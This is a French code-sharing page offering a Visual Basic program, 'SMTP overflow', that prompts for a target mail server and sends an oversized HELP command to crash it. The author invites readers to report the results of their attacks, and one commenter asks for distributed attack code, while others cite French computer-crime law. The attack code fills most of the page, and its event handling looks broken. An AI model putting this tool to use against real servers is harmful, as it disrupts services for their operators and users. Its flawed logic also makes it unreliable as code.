[ms] smtp overflow.

Soyez le premier à donner votre avis sur cette source.

Vue 4 410 fois - Téléchargée 387 fois

Cette source est considérée comme dangereuse, elle a néamoins été gardée dans un but pédagogique :
Cette source est considérée comme dangereuse, elle a néamoins été gardée dans un but pédagogique.

Description

Ce programme,
Est capable de faire "planter" un serveur SMTP. (presque pas sécurisé) En se connectant, sur le serveur et d'envoyer une commande help trop grande ex : HELP hackhackhackhackhackhackhackhackhack...

Source / Exemple :


Private Sub Form_Load()
On Error GoTo erreur
Me.Visible = False
    adresse.Caption = InputBox("Veuillez entrez l'adresse du serveur SMTP à hacké ex: smtp.comundo.fr")
Dim confirmation As Long
    confirmation = MsgBox("Attention, vous allez hacké le serveur " & adresse.Caption + "" & " voulez vous continuez", vbYesNo)
If (confirmation = 6) Then
    port.Caption = InputBox("Veuillez entrez le port du serveur SMTP. le port par défaut est le : 25")
    connexion.RemoteHost = adresse
    connexion.RemotePort = port
    connexion.Connect
Else
    MsgBox "Merci de porter, un interet à SMTP overflow."
End
erreur:
    MsgBox "SMTP overflow - Erreur, dans la configuration de l'attaque."
End
End If
End Sub
Private Sub connexion_ConnectionRequest(ByVal requestID As Long)
    connexion.SendData ("HELP hackhackhackhackhackhackhackhackhackhackhack...")
End Sub
Private Sub connexion_Close()
    MsgBox "SMTP overflow - Connexion terminé."
End Sub
Private Sub connexion_Connect()
    MsgBox "SMTP overflow - Connexion en cours."
End Sub
Private Sub connexion_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
    MsgBox "SMTP overflow - ERREUR !!"
    connexion.Close
End Sub
Private Sub connexion_SendComplete()
    MsgBox "SMTP overflow - Attaque réussi."
    connexion.Close
End Sub
Private Sub connexion_SendProgress(ByVal bytesSent As Long, ByVal bytesRemaining As Long)
    MsgBox "SMTP overflow - Attaque en cours."
End Sub

Conclusion :


Envoyer moi, les resultats de vos attaques (de vos serveurs SMTP)
ATTENTION VOTRE IP RESTE LOGER, DANS LE SERVEUR SMTP. ET VOUS POUVEZ VOUS RETROUVEZ, DANS LA LISTE NOIRE.

Codes Sources

A voir également

Ajouter un commentaire Commentaires
hassene123 Messages postés 2 Date d'inscription jeudi 21 décembre 2006 Statut Membre Dernière intervention 21 décembre 2006
21 déc. 2006 à 19:14
slt qui peut m'aider en me donner un code source d'une attaque distribué
cs_seboss Messages postés 39 Date d'inscription dimanche 13 janvier 2002 Statut Membre Dernière intervention 26 avril 2006
25 mai 2002 à 12:49
arf... arreter de critiquer maxsecurite !! Ca source nous montre une technik d'attack, et en tant que adminstrateur et dev, je vais pouvoir utiliser cette tech pour verifier que mes serveur, n'ont pas cette faille... Il faut arrete de tjs critike en mal les sources....
maxsecurite Messages postés 27 Date d'inscription jeudi 11 avril 2002 Statut Membre Dernière intervention 5 juillet 2002
12 mai 2002 à 17:28
C'est pas très gentil ce que tu à dit SysteM
cs_plf Messages postés 5 Date d'inscription mercredi 24 avril 2002 Statut Membre Dernière intervention 26 juillet 2002
29 avril 2002 à 14:59
Je vous conseille de bien méditer sur cette loi :

La loi n° 93-913 du 13 juillet 1993 a fixé l'entrée en vigueur du Nouveau Code Pénal au 1er mars 1994. Dans ses articles 323 et suivants, le Code Pénal définit la loi portant sur les atteintes aux systèmes de traitement automatisé de données :

art. 323-2 :
Le délit d'entrave est passible de trois ans d'emprisonnement et de 300 000 F d'amende.
Le délit d'entrave est le fait d'entraver ou de fausser le fonctionnement d'un système de traitement automatisé de données.

En clair je ne vous conseille pas d'utiliser ce soft !
A+
cs_Mercury Messages postés 329 Date d'inscription jeudi 3 janvier 2002 Statut Membre Dernière intervention 7 octobre 2005
29 avril 2002 à 09:39
Pour maxsecurite :

Je ne critique pas ton prog, mais simplement l'usage que certaines personnes pourraient en faire. Il y a d'autres moyens pour vérifier la robustesse d'un serveur SMTP.

Pour max12 :

Belle parole phylosophique ;-) Mais dans la pratique ...

Vous n'êtes pas encore membre ?

inscrivez-vous, c'est gratuit et ça prend moins d'une minute !

Les membres obtiennent plus de réponses que les utilisateurs anonymes.

Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes et codes sources.

Le fait d'être membre vous permet d'avoir des options supplémentaires.